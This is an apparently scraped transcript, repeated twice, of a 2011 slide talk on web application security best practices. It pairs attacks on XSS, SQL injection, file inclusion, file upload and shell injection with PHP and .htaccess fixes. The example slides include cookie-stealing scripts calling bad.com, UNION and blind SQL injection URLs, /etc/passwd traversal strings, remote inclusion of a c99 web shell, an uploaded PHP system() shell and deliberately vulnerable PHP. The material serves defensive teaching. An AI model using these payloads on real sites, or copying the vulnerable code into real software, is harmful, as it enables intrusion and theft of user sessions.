logging in or signing up BEST PRACTICES OF WEB APPLICATION SECURITY clubhack Download Post to : URL : Related Presentations : Share Add to Flag Embed Email Send to Blogs and Networks Add to Channel Uploaded from authorPOINT lite Insert YouTube videos in PowerPont slides with aS Desktop Copy embed code: (To copy code, click on the text box) Embed: URL: Thumbnail: WordPress Embed Customize Embed The presentation is successfully added In Your Favorites. Views: 139 Category: Science & Tech.. License: All Rights Reserved Like it (0) Dislike it (0) Added: August 22, 2011 This Presentation is Public Favorites: 1 Presentation Description No description available. Comments Posting comment... Premium member Presentation Transcript WEB APPLICATION SECURITY: WEB APPLICATION SECURITY BEST PRACTICES OF 2011DISCLAIMERS: DISCLAIMERS 1 2 3 4 . . .OVERVIEW: OVERVIEW Web Application Security is a vast topic and time is not enough to cover all kind of malicious attacks and techniques for avoiding them, so now we will focus on top 10 high level vulnerabilities. Web developers work in different ways using their custom libraries and intruder prevention systems and now we will see what they should do and should not do based on best practices.CONTENT: CONTENT Introduction & Statistics Statistics of vulnerabilities High level vulnerabilities TOP 10 HIGH LEVEL VULNERABILITIES Cross-Site Scripting Information Leakage SQL Injection Local/Remote File Inclusion Unrestricted uploads Shell InjectionsSTATISTICS OF VULNERABILITIES: STATISTICS OF VULNERABILITIES Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.htmlSTATISTICS OF RISK LEVELS: STATISTICS OF RISK LEVELS Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.htmlOWASP TOP 10: OWASP TOP 10 https:// www.owasp.org / index.php /Top_10_2010-MainHIGH LEVEL VULNERABILITIES: HIGH LEVEL VULNERABILITIES 0 1. Cross-Site Scripting (XSS) 0 2. Information leakage 0 3. SQL Injection 0 4. Local/Remote File Inclusion 0 5. Unrestricted File Upload 0 6. Shell injectionCROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING DESCRIPTION: Cross-Site Scripting is a type of web application vulnerability when attacker injects his executable code ( Javascript , HTML, etc.) into a vulnerable webpage. EXAMPLE: http://site.com/search.php?q=<script>alert(“XSS”)</script>CROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING TYPES: Non-Persistent Persistent 1.Non-Persistent : In this type of XSS vulnerability an attacker is able to execute his own code into a webpage but no changes can be done in that website.CROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING Non-Persistent EXAMPLE: http://www.site.com/viewtopic.php?id=4"><script>document.location="http://bad.com/logger.php?cookie="+document.cookie;</script> OR http://www.site.com/viewtopic.php?id=4”><script>document.write(“<img src=‘http://bad.com/logger.php?cookie=“+ document.cookie+”’/>”);</script>CROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING 2.Persistent : In this case attacker stores his executable script in the vulnerable website database which is being executed every time webpage is showing the data. Common targets are : Comments Chat messages E-mail messages Wall posts, etc.CROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING Persistent EXAMPLE: http:// www.youtube.com / watch?v =ys6pUis-WfwCROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING Persistent Comment in raw format: and I like the way this website developers work..hahaha :D :D <SCRIPT/XSS SRC="http://bad.com/xss.js"> </SCRIPT>CROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING Potentially Dangerous HTML elemets: src, href, lowsrc, xmlns, style, etc. TAGS <applet> <body> <embed> <frame> <script> <frameset> <html> <iframe> <img> <style> <layer> <ilayer> <meta> <object> ,etc. ATTRIBUTESCROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING Potentially Dangerous HTML events: Onblur Onchange Onclick Ondrag Onerror Onfocus Onkeypress Onkeyup Onload Onmouseover Onmousemove Onmove Onresize Onselectstart Onselect Onsubmit Onunload Onscroll , etc. * all HTML eventsCROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING SOLUTIONS: PHP function strip_tags() PHP Input Filter PHP libraries: HTML_Safe htmLawed kses Safe HTML Checker, etc. Input sanitization PHP function htmlentities() Output sanitizationBEST SOLUTION: BEST SOLUTION OWASP HTML Purifier SAFE HTML Purifier defeats XSS with an audited whitelist CLEAN HTML Purifier ensures standards- compliant output OPEN HTML Purifier is open-source and highly customizableBEST SOLUTION: BEST SOLUTION COMPARISON: Source: www.htmlpurifier.org/comparisonBEST SOLUTION: BEST SOLUTION COMPARISON: Source: www.htmlpurifier.org/comparisonINFORMATION LEAKAGE: INFORMATION LEAKAGE DESCRIPTION: Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data. EXAMPLE: sosasta.comINFORMATION LEAKAGE: INFORMATION LEAKAGE CAUSES OF: Directory listing misconfiguration Improper error handling Improper filetype handling Sensitive HTML comments, etc. 1.Directory listing misconfiguration : Leaving directory listing enabled allows the attacker to read the list of all files in a directory .INFORMATION LEAKAGE: INFORMATION LEAKAGE EXAMPLE: http://www.site.com/admin/ Directory listing misconfigurationINFORMATION LEAKAGE: INFORMATION LEAKAGE 2.Improper error handling : Because of Improper error handling all the unexpecting requests will generate error messages which will be visible to the attacker. EXAMPLE: Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/aes/public_html/news/list.php on line 81INFORMATION LEAKAGE: INFORMATION LEAKAGE 3.Improper filetype handling : Improper filetype handling allows your important files to be readable by the attacker. EXAMPLE: sql_backup.tar.gz memberlist.xml phpinfo.html dbClass.inc Login.php.bkpINFORMATION LEAKAGE: INFORMATION LEAKAGE EXAMPLE : dbClass.inc … private $host = "localhost"; private $usr = “root“; private $pwd = “i7kT0w“; public $db = "brav_new"; public function Connect(){ … } … Improper filetype handlingINFORMATION LEAKAGE: INFORMATION LEAKAGE 4. Sensitive HTML comments : Notes left by web developers may content important information which will cause of the information leakage. EXAMPLE: <form enctype="multipart/form-data" action="upload.php" method="POST"> <!--check for filetypes php, cgi, pl, bat, exe, dll, reg--> <input name="upload_file" type="file" /> …BEST SOLUTION: BEST SOLUTION Directory listing misconfiguration put a blank file named index.html in that directory. put a file named .htaccess in that directory consisting of only this line: Options –indexes NOTE: all sub-directories of that directory will also get their directory listings turned off.BEST SOLUTION: BEST SOLUTION Improper error handling The following configurations should be done in php.ini file: error_reporting = E_ALL display_errors = Off log_errors = On error_log = path/PHP_errors.log //any file in which the web server has write privileges.BEST SOLUTION: BEST SOLUTION Improper error handling Create an .htaccess file in public_html directory with the following lines: php_flag display_errors off php_flag log_errors on php_value error_log path/PHP_errors.log <Files path/PHP_errors.log> Order allow,deny Deny from all Satisfy All </FilesBEST SOLUTION: BEST SOLUTION Improper filetype handling Don’t keep your important files with the following extentions in your public web directory if you don’t link to them in the website: Compressed files(*.zip, *.rar, *.tar.gz, etc.) Database files(*.sql, *.cvs, *.xml, *.xls, etc.) Unknown files(*.inc, *.copy, *.bkp, etc.)BEST SOLUTION: BEST SOLUTION Improper filetype handling If you have a reason to keep those files in your web public directory, create an .htaccess file in that directory with the following lines of code: <Files ~ "\.(inc|sql)$"> order allow,deny deny from all </Files>BEST SOLUTION: BEST SOLUTION Sensitive HTML comments No sensetive HTML comment must be used in a website as every user will be able to view the webpage source code.SQL INJECTION: SQL INJECTION DESCRIPTION: This is a type of vulnerability when attacker injects his custom SQL query to the request to get sensetive data from the database, read or write a file. EXAMPLE: http://site.com/product.php?id=4+AND+1=2+UNION+SELECT+0,database(),1,2+--SQL INJECTION: SQL INJECTION TYPES: Normal Blind 1.Normal : In this type of SQL Injection vulnerability attacker sends a custom SQL query and gets the output in the screen .SQL INJECTION: SQL INJECTION EXAMPLE: http://site.com/product.php?id=1348+AND+1=2+union+select+1,2,user(),database(), 5,version(),7+-- Normal SQL InjectionSQL INJECTION: SQL INJECTION 2.Blind : This type of injection is identical to normal SQL Injection except that the SQL query returns positive or negative response. EXAMPLE: http://site.com/view.php?page=10+ and+substring(@@version,1,1)=5+--SQL INJECTION: SQL INJECTION PHP.ini configuration magic_quotes_gpc = on PHP functions filter_var() mysql_real_escape_string() sprintf() Put variables into the quotes(e.g: ‘$id’) Assign min privilages for mysql users SOLUTIONS:BEST SOLUTION: BEST SOLUTION GreenSQL open source database firewall Activity monitoring and audit User rights management Real-time database protection Intrusion preventation(IPS) Database caching Encrypted comunication over SSL Virtual patching ReportingBEST SOLUTION: BEST SOLUTION GreenSQL open source database firewall Source: www.greensql.netFILE INCLUSION: FILE INCLUSION DESCRIPTION: This type of web application vulnerability allows an attacker to include local or remote file into the vulnerable webpage. EXAMPLE: http://site.com/view.php?file=../../../../../../../../../../../../../../etc/passwd%00FILE INCLUSION: FILE INCLUSION TYPES: Local Remote 1.Local File Inclusion : This type of inclusion is used to include local files. Mostly used for server configuration files such as system users information, filesystem structure, etc.FILE INCLUSION: FILE INCLUSION EXAMPLE: http://site.com/include.php?file=../../../../../../../../../../../../../etc/passwd%00 root:*:0:0:Super User:/root:/bin/csh daemon:*:1:1:Daemon:/nonexistent:/sbin/nologin operator:*:2:5:Operator:/nonexistent:/sbin/nologin bin:*:3:7:Binaries:/nonexistent:/sbin/nologin tty:*:4:65533:tty Sandbox:/nonexistent:/sbin/nologin kmem:*:5:65533:kmem Sandbox:/nonexistent:/sbin/nologin games:*:7:13:Games:/nonexistent:/sbin/nologin news:*:8:8:News Subsystem:/nonexistent:/sbin/nologin man:*:9:9:Man Pages:/nonexistent:/sbin/nologin ftp:*:14:5:Anonymous FTP Admin:/usr/ftp:/nonexistent LOCAL FILE INCLUSIONFILE INCLUSION: FILE INCLUSION 2.Remote File Inclusion : Unlike the local file inclusion this is used to include remote scripts such as web shells which is more dangerous than the previous one. Main g oals: Remote code execution Remote root kit installation and complete system compromise etc.FILE INCLUSION: FILE INCLUSION EXAMPLE: http://site.com/include.php?file= http://bad.com/c99_shell.php&act=ls&dir=%2Fvar REMOTE FILE INCLUSIONFILE INCLUSION: FILE INCLUSION VULNERABLE PHP CODES <? php include($_GET['file']); ?> <? php include($_GET['file'].". htm "); ?> <? php include("includes/".$_GET['file']); ?> <? php include("includes/ " .$_GET['file ' ].". htm "); ?> etc.FILE INCLUSION: FILE INCLUSION COMMON EXPLOITS/REQUESTS ?file=../../../../../../../../../ etc / passwd ?file=../../../../../../../../../ var /lib/ locate.db ?file=../../../../../../../../../ var /log/apache/ error.log ?file=../../../../../../../../../ etc /passwd%00 ?file=../../../../../../../../../ var /www/accounts/%00 ?file=http:// bad.com / xss.php?xss = phpcode ?file=http:// bad.com / shell.txt ?file=data://text/plain;base64,SU5KRUNURUQ= ?file=../../../../../../../../../ etc / passwd .\.\.\.\.\.\.\.\.\ etc.FILE INCLUSION: FILE INCLUSION COMMON METHODS OF ATTACK Hostile data being uploaded to session files, log data, and via image uploads Using compression or audio streams, such as zlib :// or ogg ://( allow_url_fopen / allow_url_include may be disabled) Using PHP wrappers, such as php ://input Using PHP’s data: wrapper, such as data:;base64,PD9waHAgcGhwaW5mbygpOz8+ etc.FILE INCLUSION: FILE INCLUSION include()/include_once() require()/require_once() file_get_contents() fopen() file() copy() unlink() upload_tmp_dir() move_uploaded_file() imagecreatefromXXX() POTENTIALLY DANGEROUS PHP FUNCTIONSBEST SOLUTION: BEST SOLUTION Use whitelisted filenames or allow only valid file name characters ( e.g : /^(((?:\.)(?!\.))|\w)+$/) Modify the php.ini configuration file: register_globals = Off magic_quotes_gpc = On allow_url_fopen = Off allow_url_include = Off Do not use any of the potentially dangerous PHP functions(previous slide) without filtering user inputUNRESTRICTED FILE UPLOAD: UNRESTRICTED FILE UPLOAD DESCRIPTION: This vulnerability of a web application allows attacker to upload malicious files to the server. Most of the time those files are web shell scripts to take control over your web server. EXAMPLE: $usrFile = $_FILES[‘userfile’][‘name’]; $uploadFolder= "uploads/"; if(move_uploaded_file($usrFile,$uploadFolder)) { echo “File has been successfully uploaded.“; } else{ echo “Error. Please try again!"; }UNRESTRICTED FILE UPLOAD: UNRESTRICTED FILE UPLOAD POST /upload1.php HTTP/1.1 … Content-Type: multipart/form-data; boundary=xYzZY --xYzZY Content-Disposition: form-data; name="userfile"; filename="shell.php" Content-Type: text/plain <?php system($_GET['command']); ?> --xYzZY— HTTP/1.1 200 OK … File has been successfully uploaded. EXAMPLE :UNRESTRICTED FILE UPLOAD: Using blacklist for file extensions Checking only for *. php ,*. cgi ,..,*.exe, etc. extentions Checking only the mime type Checking only the content of $_FILES[‘file’][‘type’] Improper check of double extensions Improperly checking for the files such as *. php.jpg , *. php.xyz , *.asp.1234, etc. Checking only the image header Relying only on PHP functions such as getimagesize () Checking filetype in filename Checking content of the filename after the last dot(.) etc. COMMON MISTAKES: UNRESTRICTED FILE UPLOADBEST SOLUTION: BEST SOLUTION Define an . htaccess file that will only allow access to files with allowed extensions. This will also prevent double extension attacks. deny from all <Files ~ "^\w+\.( gif|jpe?g|png )$"> order deny,allow allow from all </Files>BEST SOLUTION: BEST SOLUTION Prevent overwriting of existing files (to prevent the . htaccess overwrite attack). Create a list of accepted mime-types (map extensions from those mime types). Generate a random file name and add the previously generated extension. Don’t rely on client-side validation only, since it is not enough. Ideally one should have both server-side and client-side validation implemented.SHELL INJECTION: SHELL INJECTION DESCRIPTION: Shell Injection is a web application vulnerability which allows an attacker to execute shell commands in the web server. EXAMPLE: http://site.com/manage.php?action= idSHELL INJECTION: SHELL INJECTION EXAMPLE: http://site.com/delete.php?file=/ <?php $file = $_GET[‘file’]; echo 'erasing ' . $file . ‘<br />’; system(“rm -Rf $file”) ; echo ‘done‘; ?> delete.phpSHELL INJECTION: shell_exec() exec() `` (backticks) system() passthru() eval() popen() curl_exec() curl_multi_exec() show_source() proc_open() parse_ini_file() etc. POTENTIALLY DANGEROUS PHP FUNCTIONS SHELL INJECTIONBEST SOLUTION: BEST SOLUTION Disable all the potentially dangerous PHP functions You should disable all the potentially dangerous PHP functions in php.ini configuration file which you don’t use: disable_functions = system,exec,etc . Allow only whitelisted commands to be used You may have a list of non-dangerous commands which will be allowed Use PHP built-in function to escape the user input Use functions such as escapeshellarg () and escapeshellcmd () to escape the user input.Self Test : Self Test Use web application vulnerability tools before doing a release of the product Skipfish Netsparker NIKTO N-stalker Paros w3af http:// en.wikipedia.org /wiki/ Web_application_security_scannerTHANK YOU!!: THANK YOU!! rohit@clubhack.comREFERENCES: REFERENCES http://ptresearch.blogspot.com/2010/06/web-application-vulnerability.html http://en.wikipedia.org/ http://owasp.org http://knol.google.com/k/a-short-history-of-cross-site-scripting-viruses-worms http://projects.webappsec.org/w/page/13246936/Information-Leakage http://phpsec.org/projects/guide/1.html http://en.wikipedia.org/wiki/SQL_injection http://www.darkreading.com/database-security/167901020/security/application-security/227300073/index.html http://websec.wordpress.com/category/sqli/ http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview / http://www.madirish.net/?article= 427 http://www.acunetix.com/websitesecurity/upload-forms- threat.htm You do not have the permission to view this presentation. In order to view it, please contact the author of the presentation.
BEST PRACTICES OF WEB APPLICATION SECURITY clubhack Download Post to : URL : Related Presentations : Share Add to Flag Embed Email Send to Blogs and Networks Add to Channel Uploaded from authorPOINT lite Insert YouTube videos in PowerPont slides with aS Desktop Copy embed code: (To copy code, click on the text box) Embed: URL: Thumbnail: WordPress Embed Customize Embed The presentation is successfully added In Your Favorites. Views: 139 Category: Science & Tech.. License: All Rights Reserved Like it (0) Dislike it (0) Added: August 22, 2011 This Presentation is Public Favorites: 1 Presentation Description No description available. Comments Posting comment... Premium member Presentation Transcript WEB APPLICATION SECURITY: WEB APPLICATION SECURITY BEST PRACTICES OF 2011DISCLAIMERS: DISCLAIMERS 1 2 3 4 . . .OVERVIEW: OVERVIEW Web Application Security is a vast topic and time is not enough to cover all kind of malicious attacks and techniques for avoiding them, so now we will focus on top 10 high level vulnerabilities. Web developers work in different ways using their custom libraries and intruder prevention systems and now we will see what they should do and should not do based on best practices.CONTENT: CONTENT Introduction & Statistics Statistics of vulnerabilities High level vulnerabilities TOP 10 HIGH LEVEL VULNERABILITIES Cross-Site Scripting Information Leakage SQL Injection Local/Remote File Inclusion Unrestricted uploads Shell InjectionsSTATISTICS OF VULNERABILITIES: STATISTICS OF VULNERABILITIES Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.htmlSTATISTICS OF RISK LEVELS: STATISTICS OF RISK LEVELS Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.htmlOWASP TOP 10: OWASP TOP 10 https:// www.owasp.org / index.php /Top_10_2010-MainHIGH LEVEL VULNERABILITIES: HIGH LEVEL VULNERABILITIES 0 1. Cross-Site Scripting (XSS) 0 2. Information leakage 0 3. SQL Injection 0 4. Local/Remote File Inclusion 0 5. Unrestricted File Upload 0 6. Shell injectionCROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING DESCRIPTION: Cross-Site Scripting is a type of web application vulnerability when attacker injects his executable code ( Javascript , HTML, etc.) into a vulnerable webpage. EXAMPLE: http://site.com/search.php?q=<script>alert(“XSS”)</script>CROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING TYPES: Non-Persistent Persistent 1.Non-Persistent : In this type of XSS vulnerability an attacker is able to execute his own code into a webpage but no changes can be done in that website.CROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING Non-Persistent EXAMPLE: http://www.site.com/viewtopic.php?id=4"><script>document.location="http://bad.com/logger.php?cookie="+document.cookie;</script> OR http://www.site.com/viewtopic.php?id=4”><script>document.write(“<img src=‘http://bad.com/logger.php?cookie=“+ document.cookie+”’/>”);</script>CROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING 2.Persistent : In this case attacker stores his executable script in the vulnerable website database which is being executed every time webpage is showing the data. Common targets are : Comments Chat messages E-mail messages Wall posts, etc.CROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING Persistent EXAMPLE: http:// www.youtube.com / watch?v =ys6pUis-WfwCROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING Persistent Comment in raw format: and I like the way this website developers work..hahaha :D :D <SCRIPT/XSS SRC="http://bad.com/xss.js"> </SCRIPT>CROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING Potentially Dangerous HTML elemets: src, href, lowsrc, xmlns, style, etc. TAGS <applet> <body> <embed> <frame> <script> <frameset> <html> <iframe> <img> <style> <layer> <ilayer> <meta> <object> ,etc. ATTRIBUTESCROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING Potentially Dangerous HTML events: Onblur Onchange Onclick Ondrag Onerror Onfocus Onkeypress Onkeyup Onload Onmouseover Onmousemove Onmove Onresize Onselectstart Onselect Onsubmit Onunload Onscroll , etc. * all HTML eventsCROSS-SITE SCRIPTING: CROSS-SITE SCRIPTING SOLUTIONS: PHP function strip_tags() PHP Input Filter PHP libraries: HTML_Safe htmLawed kses Safe HTML Checker, etc. Input sanitization PHP function htmlentities() Output sanitizationBEST SOLUTION: BEST SOLUTION OWASP HTML Purifier SAFE HTML Purifier defeats XSS with an audited whitelist CLEAN HTML Purifier ensures standards- compliant output OPEN HTML Purifier is open-source and highly customizableBEST SOLUTION: BEST SOLUTION COMPARISON: Source: www.htmlpurifier.org/comparisonBEST SOLUTION: BEST SOLUTION COMPARISON: Source: www.htmlpurifier.org/comparisonINFORMATION LEAKAGE: INFORMATION LEAKAGE DESCRIPTION: Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data. EXAMPLE: sosasta.comINFORMATION LEAKAGE: INFORMATION LEAKAGE CAUSES OF: Directory listing misconfiguration Improper error handling Improper filetype handling Sensitive HTML comments, etc. 1.Directory listing misconfiguration : Leaving directory listing enabled allows the attacker to read the list of all files in a directory .INFORMATION LEAKAGE: INFORMATION LEAKAGE EXAMPLE: http://www.site.com/admin/ Directory listing misconfigurationINFORMATION LEAKAGE: INFORMATION LEAKAGE 2.Improper error handling : Because of Improper error handling all the unexpecting requests will generate error messages which will be visible to the attacker. EXAMPLE: Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/aes/public_html/news/list.php on line 81INFORMATION LEAKAGE: INFORMATION LEAKAGE 3.Improper filetype handling : Improper filetype handling allows your important files to be readable by the attacker. EXAMPLE: sql_backup.tar.gz memberlist.xml phpinfo.html dbClass.inc Login.php.bkpINFORMATION LEAKAGE: INFORMATION LEAKAGE EXAMPLE : dbClass.inc … private $host = "localhost"; private $usr = “root“; private $pwd = “i7kT0w“; public $db = "brav_new"; public function Connect(){ … } … Improper filetype handlingINFORMATION LEAKAGE: INFORMATION LEAKAGE 4. Sensitive HTML comments : Notes left by web developers may content important information which will cause of the information leakage. EXAMPLE: <form enctype="multipart/form-data" action="upload.php" method="POST"> <!--check for filetypes php, cgi, pl, bat, exe, dll, reg--> <input name="upload_file" type="file" /> …BEST SOLUTION: BEST SOLUTION Directory listing misconfiguration put a blank file named index.html in that directory. put a file named .htaccess in that directory consisting of only this line: Options –indexes NOTE: all sub-directories of that directory will also get their directory listings turned off.BEST SOLUTION: BEST SOLUTION Improper error handling The following configurations should be done in php.ini file: error_reporting = E_ALL display_errors = Off log_errors = On error_log = path/PHP_errors.log //any file in which the web server has write privileges.BEST SOLUTION: BEST SOLUTION Improper error handling Create an .htaccess file in public_html directory with the following lines: php_flag display_errors off php_flag log_errors on php_value error_log path/PHP_errors.log <Files path/PHP_errors.log> Order allow,deny Deny from all Satisfy All </FilesBEST SOLUTION: BEST SOLUTION Improper filetype handling Don’t keep your important files with the following extentions in your public web directory if you don’t link to them in the website: Compressed files(*.zip, *.rar, *.tar.gz, etc.) Database files(*.sql, *.cvs, *.xml, *.xls, etc.) Unknown files(*.inc, *.copy, *.bkp, etc.)BEST SOLUTION: BEST SOLUTION Improper filetype handling If you have a reason to keep those files in your web public directory, create an .htaccess file in that directory with the following lines of code: <Files ~ "\.(inc|sql)$"> order allow,deny deny from all </Files>BEST SOLUTION: BEST SOLUTION Sensitive HTML comments No sensetive HTML comment must be used in a website as every user will be able to view the webpage source code.SQL INJECTION: SQL INJECTION DESCRIPTION: This is a type of vulnerability when attacker injects his custom SQL query to the request to get sensetive data from the database, read or write a file. EXAMPLE: http://site.com/product.php?id=4+AND+1=2+UNION+SELECT+0,database(),1,2+--SQL INJECTION: SQL INJECTION TYPES: Normal Blind 1.Normal : In this type of SQL Injection vulnerability attacker sends a custom SQL query and gets the output in the screen .SQL INJECTION: SQL INJECTION EXAMPLE: http://site.com/product.php?id=1348+AND+1=2+union+select+1,2,user(),database(), 5,version(),7+-- Normal SQL InjectionSQL INJECTION: SQL INJECTION 2.Blind : This type of injection is identical to normal SQL Injection except that the SQL query returns positive or negative response. EXAMPLE: http://site.com/view.php?page=10+ and+substring(@@version,1,1)=5+--SQL INJECTION: SQL INJECTION PHP.ini configuration magic_quotes_gpc = on PHP functions filter_var() mysql_real_escape_string() sprintf() Put variables into the quotes(e.g: ‘$id’) Assign min privilages for mysql users SOLUTIONS:BEST SOLUTION: BEST SOLUTION GreenSQL open source database firewall Activity monitoring and audit User rights management Real-time database protection Intrusion preventation(IPS) Database caching Encrypted comunication over SSL Virtual patching ReportingBEST SOLUTION: BEST SOLUTION GreenSQL open source database firewall Source: www.greensql.netFILE INCLUSION: FILE INCLUSION DESCRIPTION: This type of web application vulnerability allows an attacker to include local or remote file into the vulnerable webpage. EXAMPLE: http://site.com/view.php?file=../../../../../../../../../../../../../../etc/passwd%00FILE INCLUSION: FILE INCLUSION TYPES: Local Remote 1.Local File Inclusion : This type of inclusion is used to include local files. Mostly used for server configuration files such as system users information, filesystem structure, etc.FILE INCLUSION: FILE INCLUSION EXAMPLE: http://site.com/include.php?file=../../../../../../../../../../../../../etc/passwd%00 root:*:0:0:Super User:/root:/bin/csh daemon:*:1:1:Daemon:/nonexistent:/sbin/nologin operator:*:2:5:Operator:/nonexistent:/sbin/nologin bin:*:3:7:Binaries:/nonexistent:/sbin/nologin tty:*:4:65533:tty Sandbox:/nonexistent:/sbin/nologin kmem:*:5:65533:kmem Sandbox:/nonexistent:/sbin/nologin games:*:7:13:Games:/nonexistent:/sbin/nologin news:*:8:8:News Subsystem:/nonexistent:/sbin/nologin man:*:9:9:Man Pages:/nonexistent:/sbin/nologin ftp:*:14:5:Anonymous FTP Admin:/usr/ftp:/nonexistent LOCAL FILE INCLUSIONFILE INCLUSION: FILE INCLUSION 2.Remote File Inclusion : Unlike the local file inclusion this is used to include remote scripts such as web shells which is more dangerous than the previous one. Main g oals: Remote code execution Remote root kit installation and complete system compromise etc.FILE INCLUSION: FILE INCLUSION EXAMPLE: http://site.com/include.php?file= http://bad.com/c99_shell.php&act=ls&dir=%2Fvar REMOTE FILE INCLUSIONFILE INCLUSION: FILE INCLUSION VULNERABLE PHP CODES <? php include($_GET['file']); ?> <? php include($_GET['file'].". htm "); ?> <? php include("includes/".$_GET['file']); ?> <? php include("includes/ " .$_GET['file ' ].". htm "); ?> etc.FILE INCLUSION: FILE INCLUSION COMMON EXPLOITS/REQUESTS ?file=../../../../../../../../../ etc / passwd ?file=../../../../../../../../../ var /lib/ locate.db ?file=../../../../../../../../../ var /log/apache/ error.log ?file=../../../../../../../../../ etc /passwd%00 ?file=../../../../../../../../../ var /www/accounts/%00 ?file=http:// bad.com / xss.php?xss = phpcode ?file=http:// bad.com / shell.txt ?file=data://text/plain;base64,SU5KRUNURUQ= ?file=../../../../../../../../../ etc / passwd .\.\.\.\.\.\.\.\.\ etc.FILE INCLUSION: FILE INCLUSION COMMON METHODS OF ATTACK Hostile data being uploaded to session files, log data, and via image uploads Using compression or audio streams, such as zlib :// or ogg ://( allow_url_fopen / allow_url_include may be disabled) Using PHP wrappers, such as php ://input Using PHP’s data: wrapper, such as data:;base64,PD9waHAgcGhwaW5mbygpOz8+ etc.FILE INCLUSION: FILE INCLUSION include()/include_once() require()/require_once() file_get_contents() fopen() file() copy() unlink() upload_tmp_dir() move_uploaded_file() imagecreatefromXXX() POTENTIALLY DANGEROUS PHP FUNCTIONSBEST SOLUTION: BEST SOLUTION Use whitelisted filenames or allow only valid file name characters ( e.g : /^(((?:\.)(?!\.))|\w)+$/) Modify the php.ini configuration file: register_globals = Off magic_quotes_gpc = On allow_url_fopen = Off allow_url_include = Off Do not use any of the potentially dangerous PHP functions(previous slide) without filtering user inputUNRESTRICTED FILE UPLOAD: UNRESTRICTED FILE UPLOAD DESCRIPTION: This vulnerability of a web application allows attacker to upload malicious files to the server. Most of the time those files are web shell scripts to take control over your web server. EXAMPLE: $usrFile = $_FILES[‘userfile’][‘name’]; $uploadFolder= "uploads/"; if(move_uploaded_file($usrFile,$uploadFolder)) { echo “File has been successfully uploaded.“; } else{ echo “Error. Please try again!"; }UNRESTRICTED FILE UPLOAD: UNRESTRICTED FILE UPLOAD POST /upload1.php HTTP/1.1 … Content-Type: multipart/form-data; boundary=xYzZY --xYzZY Content-Disposition: form-data; name="userfile"; filename="shell.php" Content-Type: text/plain <?php system($_GET['command']); ?> --xYzZY— HTTP/1.1 200 OK … File has been successfully uploaded. EXAMPLE :UNRESTRICTED FILE UPLOAD: Using blacklist for file extensions Checking only for *. php ,*. cgi ,..,*.exe, etc. extentions Checking only the mime type Checking only the content of $_FILES[‘file’][‘type’] Improper check of double extensions Improperly checking for the files such as *. php.jpg , *. php.xyz , *.asp.1234, etc. Checking only the image header Relying only on PHP functions such as getimagesize () Checking filetype in filename Checking content of the filename after the last dot(.) etc. COMMON MISTAKES: UNRESTRICTED FILE UPLOADBEST SOLUTION: BEST SOLUTION Define an . htaccess file that will only allow access to files with allowed extensions. This will also prevent double extension attacks. deny from all <Files ~ "^\w+\.( gif|jpe?g|png )$"> order deny,allow allow from all </Files>BEST SOLUTION: BEST SOLUTION Prevent overwriting of existing files (to prevent the . htaccess overwrite attack). Create a list of accepted mime-types (map extensions from those mime types). Generate a random file name and add the previously generated extension. Don’t rely on client-side validation only, since it is not enough. Ideally one should have both server-side and client-side validation implemented.SHELL INJECTION: SHELL INJECTION DESCRIPTION: Shell Injection is a web application vulnerability which allows an attacker to execute shell commands in the web server. EXAMPLE: http://site.com/manage.php?action= idSHELL INJECTION: SHELL INJECTION EXAMPLE: http://site.com/delete.php?file=/ <?php $file = $_GET[‘file’]; echo 'erasing ' . $file . ‘<br />’; system(“rm -Rf $file”) ; echo ‘done‘; ?> delete.phpSHELL INJECTION: shell_exec() exec() `` (backticks) system() passthru() eval() popen() curl_exec() curl_multi_exec() show_source() proc_open() parse_ini_file() etc. POTENTIALLY DANGEROUS PHP FUNCTIONS SHELL INJECTIONBEST SOLUTION: BEST SOLUTION Disable all the potentially dangerous PHP functions You should disable all the potentially dangerous PHP functions in php.ini configuration file which you don’t use: disable_functions = system,exec,etc . Allow only whitelisted commands to be used You may have a list of non-dangerous commands which will be allowed Use PHP built-in function to escape the user input Use functions such as escapeshellarg () and escapeshellcmd () to escape the user input.Self Test : Self Test Use web application vulnerability tools before doing a release of the product Skipfish Netsparker NIKTO N-stalker Paros w3af http:// en.wikipedia.org /wiki/ Web_application_security_scannerTHANK YOU!!: THANK YOU!! rohit@clubhack.comREFERENCES: REFERENCES http://ptresearch.blogspot.com/2010/06/web-application-vulnerability.html http://en.wikipedia.org/ http://owasp.org http://knol.google.com/k/a-short-history-of-cross-site-scripting-viruses-worms http://projects.webappsec.org/w/page/13246936/Information-Leakage http://phpsec.org/projects/guide/1.html http://en.wikipedia.org/wiki/SQL_injection http://www.darkreading.com/database-security/167901020/security/application-security/227300073/index.html http://websec.wordpress.com/category/sqli/ http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview / http://www.madirish.net/?article= 427 http://www.acunetix.com/websitesecurity/upload-forms- threat.htm